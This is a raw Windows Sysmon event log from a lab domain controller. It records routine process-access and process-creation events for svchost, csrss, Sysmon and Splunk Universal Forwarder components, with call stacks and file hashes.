15:58:14.571{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007035Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:14.571{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007034Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:14.571{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007033Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:14.571{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007032Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:14.571{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007031Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:14.571{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007030Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:14.571{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7E16-5FA1-8A01-000000008801}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007029Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:14.571{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E16-5FA1-8A01-000000008801}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007028Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:14.571{D28789B6-7E16-5FA1-8A01-000000008801}732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007055Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.383{D28789B6-7E17-5FA1-8B01-000000008801}27123156C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007054Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.243{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E17-5FA1-8B01-000000008801}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007053Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.243{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007052Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.243{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007051Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.243{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007050Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.243{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007049Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.243{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007048Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.243{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007047Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.243{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007046Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.243{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007045Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.243{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007044Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.243{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7E17-5FA1-8B01-000000008801}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007043Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.243{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E17-5FA1-8B01-000000008801}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007042Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:15.243{D28789B6-7E17-5FA1-8B01-000000008801}2712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007068Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:16.415{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E18-5FA1-8C01-000000008801}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007067Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:16.415{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007066Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:16.415{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007065Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:16.415{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 